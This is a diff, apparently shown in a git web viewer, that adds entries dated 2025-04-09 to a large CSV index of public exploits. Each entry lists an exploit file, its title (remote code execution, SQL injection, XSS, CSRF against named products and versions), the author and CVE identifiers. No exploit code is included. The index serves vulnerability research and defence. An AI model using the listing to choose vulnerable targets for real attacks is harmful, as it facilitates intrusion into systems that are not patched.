45673,exploits/java/webapps/45673.py,"Apache OFBiz 16.11.04 - XML External Entity Injection",2018-10-24,"Jamie Parfet",webapps,java,,2018-10-24,2018-10-25,0,,"XML External Entity (XXE)",,,,
|
||||
48408,exploits/java/webapps/48408.txt,"Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)",2020-05-01,"Faiz Ahmed Zaidi",webapps,java,,2020-05-01,2020-05-01,0,CVE-2019-0235,,,,,
|
||||
|
@ -11991,6 +11992,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
49351,exploits/multiple/webapps/49351.html,"IncomCMS 2.0 - Insecure File Upload",2021-01-05,MoeAlBarbari,webapps,multiple,,2021-01-05,2021-01-05,0,CVE-2020-29597,,,,,
|
||||
48693,exploits/multiple/webapps/48693.go,"INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution",2020-07-26,"Patrick Hener",webapps,multiple,,2020-07-26,2020-07-26,0,CVE-2020-15492,,,,,
|
||||
34408,exploits/multiple/webapps/34408.txt,"Innovaphone PBX Admin-GUI - Cross-Site Request Forgery",2014-08-25,"Rainer Giedat",webapps,multiple,80,2014-08-25,2014-08-25,0,CVE-2014-5335;OSVDB-110269,,,,,
|
||||
52151,exploits/multiple/webapps/52151.txt,"Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)",2025-04-09,"Andrew Lemon/Red Threat",webapps,multiple,,2025-04-09,2025-04-09,0,CVE-2024-38944,,,,,
|
||||
14004,exploits/multiple/webapps/14004.txt,"Interscan Web Security 5.0 - Arbitrary File Upload / Privilege Escalation",2010-06-23,"Ivan Huertas",webapps,multiple,,2010-06-23,2010-06-23,1,OSVDB-65973,,cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf,,,
|
||||
14001,exploits/multiple/webapps/14001.txt,"Interscan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",webapps,multiple,,2010-06-23,2010-06-23,1,OSVDB-65774,,cybsec_advisory_2010_0606_InterScan_Web_Security_5_0_Arbitrary_File_Download.pdf,,,
|
||||
49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,,2020-12-03,2021-01-06,0,CVE-2020-29477,,,,,
|
||||
|
@ -12452,6 +12454,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
50233,exploits/multiple/webapps/50233.py,"ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)",2021-08-30,"numan türle",webapps,multiple,,2021-08-30,2021-08-30,0,,,,,,
|
||||
46895,exploits/multiple/webapps/46895.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting",2019-05-22,Vingroup,webapps,multiple,,2019-05-22,2019-05-22,0,CVE-2019-12189,,,http://www.exploit-db.com/screenshots/idlt47000/1.jpg,,
|
||||
46894,exploits/multiple/webapps/46894.txt,"Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions",2019-05-22,Vingroup,webapps,multiple,,2019-05-22,2019-05-22,0,CVE-2019-12252,,,,,
|
||||
52148,exploits/multiple/webapps/52148.txt,"Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege",2025-04-09,"Metin Yunus Kandemir",webapps,multiple,,2025-04-09,2025-04-09,0,CVE-2024-24409,,,,,https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
|
||||
46788,exploits/multiple/webapps/46788.txt,"Zotonic < 0.47.0 mod_admin - Cross-Site Scripting",2019-05-03,"Ramòn Janssen",webapps,multiple,,2019-05-03,2019-05-03,0,CVE-2019-11504,,,,http://www.exploit-db.comzotonic-0.46.0.zip,
|
||||
22490,exploits/multiple/webapps/22490.txt,"ZPanel 10.0.1 - Cross-Site Request Forgery / Cross-Site Scripting / SQL Injection / Password Reset",2012-11-05,pcsjj,webapps,multiple,,2012-11-05,2012-11-07,1,CVE-2012-5686;CVE-2012-5685;CVE-2012-5684;CVE-2012-5683;OSVDB-87142;OSVDB-87141;OSVDB-87140;OSVDB-87139,,,,http://www.exploit-db.comzpanelx-1_0_0.zip,
|
||||
35012,exploits/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Cross-Site Scripting",2010-11-23,"Usman Saeed",webapps,multiple,,2010-11-23,2014-10-20,1,,,,,,https://www.securityfocus.com/bid/45027/info
|
||||
|
@ -14123,6 +14126,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php,,2009-09-09,,1,OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943,,,,,
|
||||
5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php,,2008-06-14,2016-12-09,1,OSVDB-53697;CVE-2008-6665,,,,http://www.exploit-db.comAnanta10b5.zip,
|
||||
48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,,2020-09-25,2020-09-25,0,,,,,,
|
||||
52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-37732,,,,,
|
||||
37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php,,2012-04-20,2015-05-24,1,,,,,,https://www.securityfocus.com/bid/53181/info
|
||||
26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php,,2013-07-18,2013-07-21,1,OSVDB-95568;CVE-2013-5099,,,,http://www.exploit-db.comanchor-cms-0.9.1.zip,
|
||||
27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-26,2013-07-28,1,CVE-2006-0462;OSVDB-22755,,,,,https://www.securityfocus.com/bid/16393/info
|
||||
|
@ -14285,6 +14289,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
51215,exploits/php/webapps/51215.txt,"Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated",2023-04-03,"Rahul Patwari",webapps,php,,2023-04-03,2023-04-28,1,CVE-2023-23162,,,,,
|
||||
51216,exploits/php/webapps/51216.txt,"Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated",2023-04-03,"Rahul Patwari",webapps,php,,2023-04-03,2023-04-28,1,CVE-2023-23163,,,,,
|
||||
34560,exploits/php/webapps/34560.html,"ArtGK CMS - Cross-Site Scripting / HTML Injection",2010-09-01,"High-Tech Bridge SA",webapps,php,,2010-09-01,2014-09-08,1,,,,,,https://www.securityfocus.com/bid/42923/info
|
||||
52146,exploits/php/webapps/52146.py,"Artica Proxy 4.50 - Remote Code Execution (RCE)",2025-04-09,Madan,webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-2054,,,,,
|
||||
43206,exploits/php/webapps/43206.txt,"Artica Web Proxy 3.06 - Remote Code Execution",2017-12-01,hyp3rlinx,webapps,php,,2017-12-01,2017-12-01,0,CVE-2017-17055,,,,,
|
||||
31028,exploits/php/webapps/31028.txt,"Article Dashboard - '/admin/login.php' Multiple SQL Injections",2008-01-15,Xcross87,webapps,php,,2008-01-15,2014-01-19,1,CVE-2008-0286;OSVDB-40273,,,,,https://www.securityfocus.com/bid/27286/info
|
||||
4221,exploits/php/webapps/4221.txt,"Article Directory - 'index.php' Remote File Inclusion",2007-07-24,mozi,webapps,php,,2007-07-23,,1,OSVDB-39107;CVE-2007-4007,,,,,
|
||||
|
@ -15788,6 +15793,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php,,2021-07-09,2021-07-09,0,,,,,,
|
||||
50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",2022-06-14,nu11secur1ty,webapps,php,,2022-06-14,2022-06-14,0,CVE-2022-31325,,,,,
|
||||
51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,,
|
||||
52152,exploits/php/webapps/52152.NA,"ChurchCRM 5.9.1 - SQL Injection",2025-04-09,"Sanan Qasimzada",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-39304,,,,,
|
||||
51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,,
|
||||
51477,exploits/php/webapps/51477.txt,"ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31699,,,,,
|
||||
15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip,
|
||||
|
@ -28677,6 +28683,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
8095,exploits/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,webapps,php,,2009-02-22,,1,,,,,,
|
||||
29632,exploits/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 - Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",webapps,php,,2007-02-22,2017-02-14,1,CVE-2007-1152;OSVDB-37398,,,,,https://www.securityfocus.com/bid/22667/info
|
||||
26018,exploits/php/webapps/26018.txt,"Pyrox Search 1.0.5 - 'Newsearch.php' Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,webapps,php,,2005-07-21,2013-06-08,1,,,,,,https://www.securityfocus.com/bid/14343/info
|
||||
52153,exploits/php/webapps/52153.NA,"PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)",2025-04-09,"Vuln Seeker Cybersecurity Team",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-6244,,,,,
|
||||
8031,exploits/php/webapps/8031.pph,"Q-News 2.0 - Remote Command Execution",2009-02-10,Fireshot,webapps,php,,2009-02-09,2017-02-08,1,,,,,,
|
||||
26600,exploits/php/webapps/26600.txt,"Q-News 2.0 - Remote File Inclusion",2005-11-26,[GB],webapps,php,,2005-11-26,2013-07-05,1,CVE-2005-3859;OSVDB-21137,,,,,https://www.securityfocus.com/bid/15576/info
|
||||
16116,exploits/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 - Full Information Disclosure",2011-02-05,"Daniel Godoy",webapps,php,,2011-02-05,2011-02-05,1,,,,,,
|
||||
|
@ -29037,6 +29044,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
52133,exploits/php/webapps/52133.txt,"Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)",2025-04-06,"Ilteris Kaan Pehlivan",webapps,php,,2025-04-06,2025-04-06,0,CVE-2024-9458,,,,,
|
||||
43676,exploits/php/webapps/43676.txt,"Reservo Image Hosting Script 1.5 - Cross-Site Scripting",2018-01-17,"Dennis Veninga",webapps,php,,2018-01-17,2018-01-17,0,CVE-2018-5705,,,,,
|
||||
48627,exploits/php/webapps/48627.txt,"Reside Property Management 3.0 - 'profile' SQL Injection",2020-06-30,"Behzad Khalifeh",webapps,php,,2020-06-30,2020-06-30,0,,,,,,
|
||||
52150,exploits/php/webapps/52150.NA,"ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)",2025-04-09,"Jeremia Geraldi Sihombing",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-39143,,,,,
|
||||
35541,exploits/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",webapps,php,,2014-12-15,2014-12-15,0,OSVDB-115821;OSVDB-115820;OSVDB-115819;OSVDB-115818,,,,,
|
||||
46274,exploits/php/webapps/46274.txt,"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection",2019-01-28,dd_,webapps,php,80,2019-01-28,2019-01-28,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comResourceSpace_8_6_12117.zip,
|
||||
46308,exploits/php/webapps/46308.txt,"ResourceSpace 8.6 - 'watched_searches.php' SQL Injection",2019-02-04,dd_,webapps,php,80,2019-02-04,2019-02-05,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comResourceSpace_8_6_12117.zip,
|
||||
|
@ -35043,6 +35051,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869
|
||||
50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,,
|
||||
51992,exploits/python/webapps/51992.py,"djangorestframework-simplejwt 5.3.1 - Information Disclosure",2024-04-15,"Dhrumil Mistry",webapps,python,,2024-04-15,2024-04-15,0,CVE-2024-22513,,,,,
|
||||
52145,exploits/python/webapps/52145.py,"DocsGPT 0.12.0 - Remote Code Execution",2025-04-09,"Shreyas Malhotra",webapps,python,,2025-04-09,2025-04-09,1,CVE-2025-0868,,,,,
|
||||
51580,exploits/python/webapps/51580.txt,"Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)",2023-07-11,"Sander Ferdinand",webapps,python,,2023-07-11,2023-07-11,0,,,,,,
|
||||
49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
|
||||
52076,exploits/python/webapps/52076.py,"Invesalius3 - Remote Code Execution",2024-08-28,"Alessio Romano (sfoffo)_ Riccardo Degli Esposti (partywave)",webapps,python,,2024-08-28,2024-08-28,0,,,,,,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue